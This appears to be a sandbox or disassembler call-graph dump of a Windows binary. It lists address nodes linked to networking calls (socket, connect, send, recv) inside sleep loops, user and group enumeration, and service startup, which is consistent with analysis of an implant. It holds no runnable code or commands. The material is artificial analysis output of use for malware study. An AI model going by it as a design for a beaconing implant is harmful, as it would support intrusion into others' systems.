62851->62852 62853 7ffda55d6112 62852->62853 62853->62816 62854->62850 62854->62851 62855->62853 62856->62844 62856->62846 62856->62848 62856->62854 62857 7ffda55d601a CreateDirectoryA 62856->62857 62858 7ffda55d6031 GetLastError 62857->62858 62859 7ffda55d5fc5 62857->62859 62858->62859 62859->62856 62860 7ffda55d9dc2 6 API calls 62859->62860 62860->62859 62862 7ffda55d5c59 62861->62862 62863 7ffda55d5c13 62861->62863 62864 7ffda55d9dc2 6 API calls 62862->62864 62885 7ffda55d5ca3 62862->62885 62865 7ffda55d5c1c 62863->62865 62866 7ffda55d5cb2 62863->62866 62864->62885 62868 7ffda55d5cea 62865->62868 62869 7ffda55d5c25 62865->62869 62867 7ffda55d9dc2 6 API calls 62866->62867 62867->62885 62870 7ffda55d9dc2 6 API calls 62868->62870 62871 7ffda55d5c31 FindNextFileA 62869->62871 62872 7ffda55d5d22 FindFirstFileA 62869->62872 62870->62885 62873 7ffda55d5c47 62871->62873 62874 7ffda55d5d72 GetLastError 62871->62874 62875 7ffda55d5d36 62872->62875 62876 7ffda55d5d43 GetLastError 62872->62876 62879 7ffda55d5c4c strcpy 62873->62879 62877 7ffda55d5d9b 62874->62877 62878 7ffda55d5d50 62874->62878 62875->62879 62876->62878 62880 7ffda55d5d57 62876->62880 62883 7ffda55d9dc2 6 API calls 62877->62883 62878->62862 62882 7ffda55d5d8d FindClose 62878->62882 62884 7ffda55d5db8 62878->62884 62879->62862 62881 7ffda55d9dc2 6 API calls 62880->62881 62881->62878 62882->62862 62883->62878 62884->62808 62885->62808 62886->62808 62887->62808 62888->62808 62889->62826 62890 7ffda5ba3937 62893 7ffda5ba3941 62890->62893 62891 7ffda5ba3a27 EnterCriticalSection 62899 7ffda5ba3a34 62891->62899 62892 7ffda5ba39da EnterCriticalSection 62892->62893 62893->62891 62893->62892 62896 7ffda5ba3967 LeaveCriticalSection 62893->62896 62901 7ffda5ba2072 16 API calls 62893->62901 62904 7ffda5ba39b9 GetProcessHeap HeapFree 62893->62904 62894 7ffda5ba3a40 WaitForSingleObject 62906 7ffda5ba2785 20 API calls 62894->62906 62895 7ffda5ba3a8f LeaveCriticalSection 62896->62893 62898 7ffda5ba3a1a Sleep SleepEx 62896->62898 62898->62891 62899->62894 62899->62895 62900 7ffda5ba3a76 GetProcessHeap HeapFree 62899->62900 62900->62899 62902 7ffda5ba3994 WaitForSingleObject 62901->62902 62905 7ffda5ba2785 20 API calls 62902->62905 62904->62893 62905->62893 62906->62899 62907 7ffda55aa31a 62916 7ffda55aa325 62907->62916 62908 7ffda55aa42e 62912 7ffda55aa43b 62908->62912 62974 7ffda55aad75 17 API calls 62908->62974 62911 7ffda55aa34d Sleep 62911->62916 62914 7ffda55aa402 Sleep 62914->62916 62915 7ffda55aad75 17 API calls 62915->62916 62916->62908 62916->62911 62916->62914 62916->62915 62918 7ffda55aa3ee memcpy 62916->62918 62919 7ffda55ab00c socket 62916->62919 62954 7ffda55ab4ba 62916->62954 62965 7ffda55aa250 62916->62965 62918->62916 62920 7ffda55ab20b WSAGetLastError 62919->62920 62921 7ffda55ab043 62919->62921 62924 7ffda55ac852 13 API calls 62920->62924 62922 7ffda55ab047 62921->62922 62923 7ffda55ab065 62921->62923 62975 7ffda55aaca9 62922->62975 62927 7ffda55aaca9 15 API calls 62923->62927 62926 7ffda55ab22f 62924->62926 62929 7ffda55ab07f 62926->62929 62930 7ffda55ab239 62926->62930 62931 7ffda55ab063 62927->62931 62934 7ffda55ac852 13 API calls 62929->62934 62933 7ffda55ac852 13 API calls 62930->62933 62952 7ffda55ab077 62931->62952 62988 7ffda55aadda setsockopt 62931->62988 62932 7ffda55ab0be 62936 7ffda55ab0c3 htonl htons connect 62932->62936 62932->62952 62938 7ffda55ab0a0 62933->62938 62934->62938 62940 7ffda55ab11c WSAGetLastError 62936->62940 62941 7ffda55ab101 62936->62941 62938->62916 62943 7ffda55ab12d 62940->62943 62944 7ffda55ab1de WSAGetLastError 62940->62944 62942 7ffda55aaca9 15 API calls 62941->62942 62946 7ffda55ab10e 62942->62946 62947 7ffda55ab135 select 62943->62947 62943->62952 62945 7ffda55ac852 13 API calls 62944->62945 62945->62952 62946->62926 62946->62952 62948 7ffda55ab196 62947->62948 62949 7ffda55ab1c0 62947->62949 62948->62941 62951 7ffda55ab19c WSAGetLastError 62948->62951 62950 7ffda55ac852 13 API calls 62949->62950 62950->62952 62953 7ffda55ac852 13 API calls 62951->62953 62992 7ffda55aad75 17 API calls 62952->62992 62953->62952 62955 7ffda55ab548 62954->62955 62956 7ffda55ab4d4 62954->62956 62957 7ffda55ac852 13 API calls 62955->62957 62956->62955 62958 7ffda55ab4d9 recv 62956->62958 62959 7ffda55ab4f3 62957->62959 62960 7ffda55ab4fc WSAGetLastError 62958->62960 62961 7ffda55ab4ef 62958->62961 62959->62916 62960->62959 62962 7ffda55ab510 62960->62962 62961->62959 62963 7ffda55ac852 13 API calls 62961->62963 62964 7ffda55ac852 13 API calls 62962->62964 62963->62959 62964->62959 62966 7ffda55aa268 62965->62966 62967 7ffda55aa312 62965->62967 62966->62967 62993 7ffda55a9035 62966->62993 62967->62916 62970 7ffda55aa304 LeaveCriticalSection 62970->62967 62971 7ffda55aa298 62971->62970 62972 7ffda55ac852 13 API calls 62971->62972 62996 7ffda55ae417 62971->62996 62972->62971 62974->62912 62976 7ffda55aacb9 ioctlsocket 62975->62976 62978 7ffda55aacdc 62976->62978 62979 7ffda55aaced WSAGetLastError 62976->62979 62978->62932 62981 7ffda55aabf4 setsockopt 62978->62981 62980 7ffda55ac852 13 API calls 62979->62980 62980->62978 62982 7ffda55aac29 setsockopt 62981->62982 62983 7ffda55aac84 WSAGetLastError 62981->62983 62985 7ffda55aac5f WSAGetLastError 62982->62985 62987 7ffda55aac55 62982->62987 62984 7ffda55ac852 13 API calls 62983->62984 62984->62987 62986 7ffda55ac852 13 API calls 62985->62986 62986->62987 62987->62931 62989 7ffda55aae17 62988->62989 62990 7ffda55aae21 WSAGetLastError 62988->62990 62989->62932 62991 7ffda55ac852 13 API calls 62990->62991 62991->62989 62992->62929 62994 7ffda55a904b GetSystemTimeAsFileTime 62993->62994 62995 7ffda55a9040 EnterCriticalSection 62993->62995 62994->62995 62995->62971 62997 7ffda55ae447 62996->62997 63011 7ffda55ae46f 62996->63011 62998 7ffda55ae4b7 62997->62998 62999 7ffda55ae451 62997->62999 63027 7ffda55adc4a 97 API calls 62998->63027 63000 7ffda55ae48d 62999->63000 63001 7ffda55ae453 62999->63001 63003 7ffda55ae4be 63000->63003 63004 7ffda55ae494 63000->63004 63005 7ffda55ae4c5 63001->63005 63006 7ffda55ae45a 63001->63006 63028 7ffda55adcbf 54 API calls 63003->63028 63008 7ffda55ae4b0 63004->63008 63012 7ffda55ae49b 63004->63012 63029 7ffda55addf1 31 API calls 63005->63029 63009 7ffda55ae45c 63006->63009 63016 7ffda55ae478 63006->63016 63021 7ffda55adb58 63008->63021 63013 7ffda55ae4cc 63009->63013 63014 7ffda55ae463 63009->63014 63011->62971 63012->63011 63026 7ffda55adb66 190 API calls 63012->63026 63030 7ffda55ade9a 25 API calls 63013->63030 63014->63011 63024 7ffda55adf93 41 API calls 63014->63024 63016->63011 63025 7ffda55adf13 22 API calls 63016->63025 63031 7ffda55adb10 63021->63031 63024->63011 63025->63011 63026->63011 63027->63011 63028->63011 63029->63011 63030->63011 63038 7ffda55abceb 63031->63038 63036 7ffda55abceb 2 API calls 63037 7ffda55adb31 63036->63037 63037->63011 63039 7ffda55abcf6 63038->63039 63040 7ffda55abd01 QueryPerformanceFrequency QueryPerformanceCounter 63038->63040 63039->63037 63041 7ffda55a6f2b 63039->63041 63040->63039 63076 7ffda55a6eed 63041->63076 63044 7ffda55a6f41 63046 7ffda55a6f4e 63044->63046 63085 7ffda55a8b2c 29 API calls 63044->63085 63045 7ffda55ab930 15 API calls 63047 7ffda55a6f69 63045->63047 63046->63036 63049 7ffda55a466b 15 API calls 63047->63049 63050 7ffda55a6f7e 63049->63050 63051 7ffda55a6f88 strlen 63050->63051 63052 7ffda55a702f 63050->63052 63055 7ffda55a6fa5 63051->63055 63056 7ffda55a6fbe strlen 63051->63056 63052->63044 63053 7ffda55a7037 strlen 63052->63053 63057 7ffda55a704e 63053->63057 63058 7ffda55a7064 strlen 63053->63058 63055->63056 63061 7ffda55a6faa strlen 63055->63061 63081 7ffda55a3714 17 API calls 63056->63081 63057->63058 63063 7ffda55a7053 strlen 63057->63063 63083 7ffda55a3714 17 API calls 63058->63083 63060 7ffda55a710a 63073 7ffda55a7131 63060->63073 63086 7ffda55a8b47 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 63060->63086 63087 7ffda55a81b3 14 API calls 63060->63087 63061->63056 63063->63058 63065 7ffda55a7004 63065->63044 63082 7ffda55a4246 15 API calls 63065->63082 63066 7ffda55a70a7 63068 7ffda55a70b4 CompareFileTime 63066->63068 63071 7ffda55a70ea 63066->63071 63068->63044 63072 7ffda55a70cc 63068->63072 63070 7ffda55a702d 63070->63052 63071->63044 63084 7ffda55a2c59 15 API calls 63072->63084 63073->63060 63088 7ffda55a8237 48 API calls 63073->63088 63089 7ffda55a7e40 26 API calls 63073->63089 63090 7ffda55a5dd0 63076->63090 63080 7ffda55a6efa 63080->63044 63080->63045 63081->63065 63082->63070 63083->63066 63084->63071 63085->63060 63086->63060 63087->63060 63088->63073 63089->63073 63091 7ffda55a5192 16 API calls 63090->63091 63092 7ffda55a5e13 63091->63092 63093 7ffda55a5e60 63092->63093 63094 7ffda55a5e17 strlen 63092->63094 63093->63080 63103 7ffda55ab25e 34 API calls 63093->63103 63095 7ffda55a5e2d strcmp 63094->63095 63095->63093 63097 7ffda55a5e6e 63095->63097 63104 7ffda55a4246 15 API calls 63097->63104 63099 7ffda55a5e94 63099->63093 63100 7ffda55a5ea6 63099->63100 63105 7ffda55a3f67 15 API calls 63100->63105 63102 7ffda55a5eb0 63102->63093 63103->63080 63104->63099 63105->63102 63106 7ff70cad12fd 63109 7ff70cad1131 63106->63109 63110 7ff70cad115a 63109->63110 63111 7ff70cad1172 63110->63111 63112 7ff70cad1169 Sleep 63110->63112 63113 7ff70cad1194 63111->63113 63114 7ff70cad1188 _amsg_exit 63111->63114 63112->63110 63115 7ff70cad11b5 63113->63115 63116 7ff70cad119a _initterm 63113->63116 63114->63115 63117 7ff70cad11c5 _initterm 63115->63117 63118 7ff70cad11de 63115->63118 63116->63115 63117->63118 63130 7ff70cada1bb 63118->63130 63121 7ff70cad122e 63122 7ff70cad1233 malloc 63121->63122 63123 7ff70cad1253 63122->63123 63124 7ff70cad1283 63123->63124 63125 7ff70cad1258 strlen malloc 63123->63125 63141 7ff70cad1fa9 63124->63141 63125->63123 63127 7ff70cad12c4 63128 7ff70cad12e3 _cexit 63127->63128 63129 7ff70cad12e8 63127->63129 63128->63129 63131 7ff70cad1208 SetUnhandledExceptionFilter 63130->63131 63133 7ff70cada1d9 63130->63133 63131->63121 63132 7ff70cada3df 63132->63131 63135 7ff70cada407 VirtualProtect 63132->63135 63133->63132 63134 7ff70cada250 63133->63134 63139 7ff70cada28f 63133->63139 63134->63132 63136 7ff70cada26e 63134->63136 63135->63132 63136->63134 63145 7ff70cada074 VirtualQuery VirtualProtect GetLastError 63136->63145 63138 7ff70cada2fa 63146 7ff70cada074 VirtualQuery VirtualProtect GetLastError 63138->63146 63139->63132 63139->63138 63142 7ff70cad1fb9 63141->63142 63147 7ff70cad1dbc 63142->63147 63145->63136 63146->63139 63148 7ff70cad1dc6 strcmp 63147->63148 63150 7ff70cad1e40 63148->63150 63151 7ff70cad1ddd strcmp 63148->63151 63154 7ff70cad161a 116 API calls 63150->63154 63152 7ff70cad1df4 StartServiceCtrlDispatcherA 63151->63152 63153 7ff70cad1f81 63151->63153 63156 7ff70cad1e98 GetLastError 63152->63156 63165 7ff70cad1e2d 63152->63165 63155 7ff70cad2ef2 6 API calls 63153->63155 63157 7ff70cad1e45 63154->63157 63155->63165 63158 7ff70cad2ef2 6 API calls 63156->63158 63159 7ff70cad1e4b 63157->63159 63160 7ff70cad16e3 405 API calls 63157->63160 63158->63165 63168 7ff70cad1a63 10 API calls 63159->63168 63166 7ff70cad1e5f 63160->63166 63162 7ff70cad1e50 63169 7ff70cad1b1c 13 API calls 63162->63169 63164 7ff70cad1e69 _read 63164->63159 63164->63166 63165->63127 63166->63159 63166->63164 63167 7ff70cad19e2 25 API calls 63166->63167 63167->63166 63168->63162 63169->63165 63170 7ffdac12c415 63178 7ffdac12c422 63170->63178 63171 7ffdac12c632 63172 7ffdac12c443 Sleep 63172->63178 63174 7ffdac12c4bf Sleep 63174->63178 63175 7ffdac1277a2 6 API calls 63175->63178 63176 7ffdac12c592 memcpy 63176->63178 63178->63171 63178->63172 63178->63174 63178->63175 63178->63176 63179 7ffdac12c3ac 8 API calls 63178->63179 63180 7ffdac1261a2 13 API calls 63178->63180 63179->63178 63180->63178 63181 7ffda5ba33cf 63182 7ffda5ba33d7 63181->63182 63183 7ffda5ba33fa LeaveCriticalSection 63181->63183 63182->63181 63198 7ffda5ba2f7d 63182->63198 63192 7ffda5ba3388 63183->63192 63184 7ffda5ba340c GetProcessHeap HeapFree 63184->63192 63186 7ffda5ba34eb Sleep SleepEx 63188 7ffda5ba34fb EnterCriticalSection 63186->63188 63187 7ffda5ba343a EnterCriticalSection 63189 7ffda5ba345d LeaveCriticalSection 63187->63189 63187->63192 63190 7ffda5ba3508 63188->63190 63189->63192 63191 7ffda5ba3539 LeaveCriticalSection 63190->63191 63193 7ffda5ba3520 GetProcessHeap HeapFree 63190->63193 63192->63184 63192->63186 63192->63187 63192->63188 63192->63189 63194 7ffda5ba347c 63192->63194 63195 7ffda5ba89d5 GetSystemTimeAsFileTime 63192->63195 63193->63190 63196 7ffda5ba2072 16 API calls 63194->63196 63195->63192 63197 7ffda5ba34ca EnterCriticalSection 63196->63197 63199 7ffda5ba2fa8 63198->63199 63200 7ffda5ba302c 63198->63200 63199->63200 63202 7ffda5ba2fad 63199->63202 63201 7ffda5ba2072 16 API calls 63200->63201 63208 7ffda5ba3000 63201->63208 63203 7ffda5ba2fb6 send 63202->63203 63204 7ffda5ba2ff9 63202->63204 63203->63202 63205 7ffda5ba2fda WSAGetLastError 63203->63205 63207 7ffda5ba2072 16 API calls 63204->63207 63204->63208 63206 7ffda5ba2072 16 API calls 63205->63206 63206->63204 63207->63208 63208->63182 63209 7ffda557135a 63215 7ffda5571365 63209->63215 63210 7ffda557146e 63211 7ffda557147b 63210->63211 63276 7ffda55757a5 17 API calls 63210->63276 63214 7ffda557138d Sleep 63214->63215 63215->63210 63215->63214 63216 7ffda55757a5 17 API calls 63215->63216 63218 7ffda5571442 Sleep 63215->63218 63220 7ffda557142e memcpy 63215->63220 63221 7ffda5575a3c socket 63215->63221 63256 7ffda5575eea 63215->63256 63267 7ffda5571290 63215->63267 63216->63215 63218->63215 63220->63215 63222 7ffda5575a73 63221->63222 63223 7ffda5575c3b WSAGetLastError 63221->63223 63224 7ffda5575a77 63222->63224 63225 7ffda5575a95 63222->63225 63226 7ffda55740d2 13 API calls 63223->63226 63277 7ffda55756d9 63224->63277 63229 7ffda55756d9 15 API calls 63225->63229 63228 7ffda5575c5f 63226->63228 63231 7ffda5575c69 63228->63231 63232 7ffda5575aaf 63228->63232 63233 7ffda5575a93 63229->63233 63236 7ffda55740d2 13 API calls 63231->63236 63234 7ffda55740d2 13 API calls 63232->63234 63237 7ffda5575aa7 63233->63237 63290 7ffda557580a setsockopt 63233->63290 63238 7ffda5575ad0 63234->63238 63235 7ffda5575aee 63235->63237 63240 7ffda5575af3 htonl htons connect 63235->63240 63236->63238 63294 7ffda55757a5 17 API calls 63237->63294 63238->63215 63243 7ffda5575b31 63240->63243 63244 7ffda5575b4c WSAGetLastError 63240->63244 63245 7ffda55756d9 15 API calls 63243->63245 63246 7ffda5575b5d 63244->63246 63247 7ffda5575c0e WSAGetLastError 63244->63247 63249 7ffda5575b3e 63245->63249 63246->63237 63250 7ffda5575b65 select 63246->63250 63248 7ffda55740d2 13 API calls 63247->63248 63248->63237 63249->63228 63249->63237 63251 7ffda5575bf0 63250->63251 63252 7ffda5575bc6 63250->63252 63253 7ffda55740d2 13 API calls 63251->63253 63252->63243 63254 7ffda5575bcc WSAGetLastError 63252->63254 63253->63237 63255 7ffda55740d2 13 API calls 63254->63255 63255->63237 63257 7ffda5575f04 63256->63257 63258 7ffda5575f78 63256->63258 63257->63258 63260 7ffda5575f09 recv 63257->63260 63259 7ffda55740d2 13 API calls 63258->63259 63266 7ffda5575f23 63259->63266 63261 7ffda5575f1f 63260->63261 63262 7ffda5575f2c WSAGetLastError 63260->63262 63264 7ffda55740d2 13 API calls 63261->63264 63261->63266 63263 7ffda5575f40 63262->63263 63262->63266 63265 7ffda55740d2 13 API calls 63263->63265 63264->63266 63265->63266 63266->63215 63268 7ffda5571352 63267->63268 63269 7ffda55712a8 63267->63269 63268->63215 63269->63268 63295 7ffda5579395 63269->63295 63272 7ffda5571344 LeaveCriticalSection 63272->63268 63273 7ffda55712d8 63273->63272 63274 7ffda55740d2 13 API calls 63273->63274 63298 7ffda557e1cc 63273->63298 63274->63273 63276->63211 63278 7ffda55756e9 ioctlsocket 63277->63278 63280 7ffda557571d WSAGetLastError 63278->63280 63282 7ffda557570c 63278->63282 63281 7ffda55740d2 13 API calls 63280->63281 63281->63282 63282->63235 63283 7ffda5575624 setsockopt 63282->63283 63284 7ffda55756b4 WSAGetLastError 63283->63284 63285 7ffda5575659 setsockopt 63283->63285 63287 7ffda55740d2 13 API calls 63284->63287 63286 7ffda557568f WSAGetLastError 63285->63286 63289 7ffda5575685 63285->63289 63288 7ffda55740d2 13 API calls 63286->63288 63287->63289 63288->63289 63289->63233 63291 7ffda5575851 WSAGetLastError 63290->63291 63292 7ffda5575847 63290->63292 63293 7ffda55740d2 13 API calls 63291->63293 63292->63235 63293->63292 63294->63232 63296 7ffda55712bb EnterCriticalSection 63295->63296 63297 7ffda55793ab GetSystemTimeAsFileTime 63295->63297 63296->63273 63297->63296 63299 7ffda557e1fc 63298->63299 63315 7ffda557e246 63298->63315 63300 7ffda557e351 63299->63300 63301 7ffda557e20a 63299->63301 63350 7ffda557dad2 77 API calls 63300->63350 63302 7ffda557e210 63301->63302 63303 7ffda557e2be 63301->63303 63306 7ffda557e35f 63302->63306 63307 7ffda557e21b 63302->63307 63305 7ffda557e306 63303->63305 63312 7ffda557e2c5 63303->63312 63309 7ffda557e30d 63305->63309 63310 7ffda557e34a 63305->63310 63352 7ffda557df3e 63 API calls 63306->63352 63313 7ffda557e270 63307->63313 63314 7ffda557e21d 63307->63314 63308 7ffda557e294 63308->63315 63309->63315 63340 7ffda557d1db 63309->63340 63349 7ffda557d822 59 API calls 63310->63349 63312->63315 63347 7ffda557d748 64 API calls 63312->63347 63317 7ffda557e27b 63313->63317 63318 7ffda557e358 63313->63318 63319 7ffda557e224 63314->63319 63320 7ffda557e255 63314->63320 63315->63273 63322 7ffda557e2a3 63317->63322 63323 7ffda557e27d 63317->63323 63351 7ffda557dd0a 60 API calls 63318->63351 63325 7ffda557e22f 63319->63325 63326 7ffda557e36d 63319->63326 63320->63315 63344 7ffda557e0b6 23 API calls 63320->63344 63322->63315 63346 7ffda557de24 60 API calls 63322->63346 63330 7ffda557e288 63323->63330 63331 7ffda557e366 63323->63331 63332 7ffda557e31b 63325->63332 63333 7ffda557e23a 63325->63333 63354 7ffda557e146 23 API calls 63326->63354 63330->63315 63337 7ffda557e28f 63330->63337 63353 7ffda557dfe2 56 API calls 63331->63353 63348 7ffda557d1e9 25 API calls 63332->63348 63333->63315 63343 7ffda557d262 21 API calls 63333->63343 63345 7ffda557d8f6 64 API calls 63337->63345 63355 7ffda557d030 63340->63355 63343->63315 63344->63315 63345->63308 63346->63315 63347->63315 63348->63315 63349->63315 63350->63308 63351->63315 63352->63315 63353->63315 63354->63315 63382 7ffda5571b9b 63355->63382 63360 7ffda557d080 63388 7ffda5578f58 17 API calls 63360->63388 63361 7ffda557d087 63363 7ffda5579395 GetSystemTimeAsFileTime 63361->63363 63364 7ffda557d09a 63363->63364 63365 7ffda557d1b8 63364->63365 63367 7ffda557d0c6 strlen 63364->63367 63390 7ffda5578f58 17 API calls 63365->63390 63369 7ffda55740d2 13 API calls 63367->63369 63368 7ffda557d1bd 63370 7ffda5571b9b 2 API calls 63368->63370 63372 7ffda557d05a 63368->63372 63371 7ffda557d0fe GetProcessHeap HeapAlloc 63369->63371 63370->63372 63373 7ffda557d120 63371->63373 63374 7ffda557d19d 63371->63374 63372->63315 63375 7ffda5579395 GetSystemTimeAsFileTime 63373->63375 63376 7ffda55740d2 13 API calls 63374->63376 63377 7ffda557d14f strcpy 63375->63377 63378 7ffda557d1b3 63376->63378 63389 7ffda55714a2 20 API calls 63377->63389 63378->63365 63380 7ffda557d178 63380->63364 63381 7ffda557d181 GetProcessHeap HeapFree 63380->63381 63381->63364 63383 7ffda5571bb1 QueryPerformanceFrequency QueryPerformanceCounter 63382->63383 63384 7ffda5571ba6 63382->63384 63383->63384 63384->63372 63385 7ffda5578f37 EnterCriticalSection 63384->63385 63391 7ffda5577539 63385->63391 63388->63372 63389->63380 63390->63368 63392 7ffda5577555 63391->63392 63394 7ffda5577545 63391->63394 63397 7ffda557648f 63392->63397 63396 7ffda557754f 63394->63396 63419 7ffda5576d5f 63394->63419 63396->63360 63396->63361 63441 7ffda55763af 8 API calls 63397->63441 63399 7ffda5576ab2 63401 7ffda5576abb 63399->63401 63402 7ffda5576af8 63399->63402 63400 7ffda55769ac NetLocalGroupEnum 63404 7ffda55764a4 63400->63404 63405 7ffda5576c09 63401->63405 63410 7ffda5576ac3 63401->63410 63403 7ffda55740d2 13 API calls 63402->63403 63403->63410 63404->63399 63404->63400 63406 7ffda5576a22 GetProcessHeap HeapAlloc 63404->63406 63409 7ffda5576989 NetApiBufferFree 63404->63409 63408 7ffda55740d2 13 API calls 63405->63408 63411 7ffda5576a55 63406->63411 63418 7ffda55764b3 63406->63418 63417 7ffda5576ae5 63408->63417 63409->63404 63442 7ffda55763af 8 API calls 63410->63442 63413 7ffda5576a61 memcpy GetProcessHeap HeapFree 63411->63413 63414 7ffda5576a90 63411->63414 63412 7ffda5576ac8 63416 7ffda55740d2 13 API calls 63412->63416 63413->63414 63414->63394 63415 7ffda55740d2 13 API calls 63415->63418 63416->63417 63417->63394 63418->63404 63418->63415 63420 7ffda5576c7f 8 API calls 63419->63420 63426 7ffda5576d74 63420->63426 63421 7ffda55773c3 63422 7ffda55773cc 63421->63422 63423 7ffda5577409 63421->63423 63425 7ffda557751a 63422->63425 63428 7ffda55773d4 63422->63428 63427 7ffda55740d2 13 API calls 63423->63427 63424 7ffda55772a6 NetUserEnum 63424->63426 63431 7ffda55740d2 13 API calls 63425->63431 63426->63421 63426->63424 63429 7ffda5577283 NetApiBufferFree 63426->63429 63432 7ffda5577322 GetProcessHeap HeapAlloc 63426->63432 63427->63428 63430 7ffda5576c7f 8 API calls 63428->63430 63429->63426 63433 7ffda55773d9 63430->63433 63434 7ffda55773f6 63431->63434 63435 7ffda5576d83 63432->63435 63436 7ffda557735c 63432->63436 63439 7ffda55740d2 13 API calls 63433->63439 63434->63396 63435->63426 63440 7ffda55740d2 13 API calls 63435->63440 63437 7ffda55773a1 63436->63437 63438 7ffda5577368 memcpy GetProcessHeap HeapFree 63436->63438 63437->63396 63438->63437 63439->63434 63440->63435 63441->63404 63442->63412 63443 7ffdac12605a 63447 7ffdac126065 63443->63447 63444 7ffdac12616e 63445 7ffdac12617b 63444->63445 63510 7ffdac1214c5 63444->63510 63446 7ffdac12608d Sleep 63446->63447 63447->63444 63447->63446 63451 7ffdac126142 Sleep 63447->63451 63452 7ffdac1214c5 10 API calls 63447->63452 63454 7ffdac12612e memcpy 63447->63454 63455 7ffdac12175c socket 63447->63455 63490 7ffdac121c0a 63447->63490 63501 7ffdac125f90 63447->63501 63451->63447 63452->63447 63454->63447 63456 7ffdac121793 63455->63456 63457 7ffdac12195b WSAGetLastError 63455->63457 63458 7ffdac1217b5 63456->63458 63459 7ffdac121797 63456->63459 63460 7ffdac1277a2 6 API calls 63457->63460 63463 7ffdac1213f9 8 API calls 63458->63463 63519 7ffdac1213f9 63459->63519 63462 7ffdac12197f 63460->63462 63465 7ffdac1217cf 63462->63465 63466 7ffdac121989 63462->63466 63467 7ffdac1217b3 63463->63467 63468 7ffdac1277a2 6 API calls 63465->63468 63470 7ffdac1277a2 6 API calls 63466->63470 63471 7ffdac1217c7 63467->63471 63532 7ffdac12152a setsockopt 63467->63532 63472 7ffdac1217f0 63468->63472 63469 7ffdac12180e 63469->63471 63474 7ffdac121813 htonl htons connect 63469->63474 63470->63472 63476 7ffdac1214c5 10 API calls 63471->63476 63472->63447 63477 7ffdac121851 63474->63477 63478 7ffdac12186c WSAGetLastError 63474->63478 63476->63465 63479 7ffdac1213f9 8 API calls 63477->63479 63480 7ffdac12192e WSAGetLastError 63478->63480 63481 7ffdac12187d 63478->63481 63483 7ffdac12185e 63479->63483 63482 7ffdac1277a2 6 API calls 63480->63482 63481->63471 63484 7ffdac121885 select 63481->63484 63482->63471 63483->63462 63483->63471 63485 7ffdac121910 63484->63485 63486 7ffdac1218e6 63484->63486 63487 7ffdac1277a2 6 API calls 63485->63487 63486->63477 63488 7ffdac1218ec WSAGetLastError 63486->63488 63487->63471 63489 7ffdac1277a2 6 API calls 63488->63489 63489->63471 63491 7ffdac121c24 63490->63491 63492 7ffdac121c98 63490->63492 63491->63492 63494 7ffdac121c29 recv 63491->63494 63493 7ffdac1277a2 6 API calls 63492->63493 63495 7ffdac121c43 63493->63495 63496 7ffdac121c3f 63494->63496 63497 7ffdac121c4c WSAGetLastError 63494->63497 63495->63447 63496->63495 63499 7ffdac1277a2 6 API calls 63496->63499 63497->63495 63498 7ffdac121c60 63497->63498 63500 7ffdac1277a2 6 API calls 63498->63500 63499->63495 63500->63495 63502 7ffdac126052 63501->63502 63503 7ffdac125fa8 63501->63503 63502->63447 63503->63502 63536 7ffdac1222f5 63503->63536 63506 7ffdac126044 LeaveCriticalSection 63506->63502 63507 7ffdac125fd8 63507->63506 63508 7ffdac1277a2 6 API calls 63507->63508 63539 7ffdac12bc77 63507->63539 63508->63507 63511 7ffdac1214d9 63510->63511 63518 7ffdac1214d3 63510->63518 63790 7ffdac121462 shutdown 63511->63790 63514 7ffdac1214f1 63516 7ffdac1277a2 6 API calls 63514->63516 63515 7ffdac121509 WSAGetLastError 63517 7ffdac1277a2 6 API calls 63515->63517 63516->63518 63517->63518 63518->63445 63520 7ffdac121409 ioctlsocket 63519->63520 63522 7ffdac12143d WSAGetLastError 63520->63522 63524 7ffdac12142c 63520->63524 63523 7ffdac1277a2 6 API calls 63522->63523 63523->63524 63524->63469 63525 7ffdac121344 setsockopt 63524->63525 63526 7ffdac1213d4 WSAGetLastError 63525->63526 63527 7ffdac121379 setsockopt 63525->63527 63530 7ffdac1277a2 6 API calls 63526->63530 63528 7ffdac1213af WSAGetLastError 63527->63528 63529 7ffdac1213a5 63527->63529 63531 7ffdac1277a2 6 API calls 63528->63531 63529->63467 63530->63529 63531->63529 63533 7ffdac121571 WSAGetLastError 63532->63533 63534 7ffdac121567 63532->63534 63535 7ffdac1277a2 6 API calls 63533->63535 63534->63469 63535->63534 63537 7ffdac122300 EnterCriticalSection 63536->63537 63538 7ffdac12230b GetSystemTimeAsFileTime 63536->63538 63537->63507 63538->63537 63540 7ffdac12bd05 63539->63540 63541 7ffdac12bc99 63539->63541 63542 7ffdac12bd20 63540->63542 63545 7ffdac12bd0f 63540->63545 63551 7ffdac12bcb0 63541->63551 63604 7ffdac12689b 63541->63604 63543 7ffdac12689b 2 API calls 63542->63543 63544 7ffdac12bcfb 63543->63544 63544->63507 63545->63544 63547 7ffdac1222f5 GetSystemTimeAsFileTime 63545->63547 63550 7ffdac12be02 63547->63550 63549 7ffdac12c0d3 63552 7ffdac12c167 63549->63552 63560 7ffdac12c118 63549->63560 63553 7ffdac127400 8 API calls 63550->63553 63551->63544 63554 7ffdac12c26f GetProcessHeap HeapAlloc 63551->63554 63555 7ffdac12c262 63551->63555 63557 7ffdac12689b 2 API calls 63552->63557 63556 7ffdac12be9c 63553->63556 63558 7ffdac12c297 memcpy 63554->63558 63559 7ffdac12c309 63554->63559 63555->63554 63634 7ffdac125ec9 12 API calls 63556->63634 63562 7ffdac12c171 63557->63562 63587 7ffdac12c2d7 63558->63587 63563 7ffdac1277a2 6 API calls 63559->63563 63566 7ffdac12c142 63560->63566 63567 7ffdac12c187 63560->63567 63607 7ffdac12b910 63562->63607 63568 7ffdac12c02f 63563->63568 63564 7ffdac12beb8 63569 7ffdac12bec0 63564->63569 63570 7ffdac12c039 63564->63570 63573 7ffdac12c196 63566->63573 63574 7ffdac12c14c 63566->63574 63613 7ffdac12b9f4 63567->63613 63568->63544 63575 7ffdac12d3f2 9 API calls 63569->63575 63640 7ffdac123805 30 API calls 63570->63640 63576 7ffdac12689b 2 API calls 63573->63576 63578 7ffdac12689b 2 API calls 63574->63578 63579 7ffdac12beec 63575->63579 63581 7ffdac12c1a0 63576->63581 63577 7ffdac12c06c 63577->63569 63578->63544 63580 7ffdac12befe 63579->63580 63583 7ffdac12c08c memcpy 63579->63583 63635 7ffdac1268e2 8 API calls 63580->63635 63581->63544 63586 7ffdac1222f5 GetSystemTimeAsFileTime 63581->63586 63582 7ffdac12c2ed GetProcessHeap HeapFree 63582->63544 63583->63580 63585 7ffdac12bf08 63636 7ffdac126a68 10 API calls 63585->63636 63588 7ffdac12c1fd 63586->63588 63593 7ffdac12c2df 63587->63593 63642 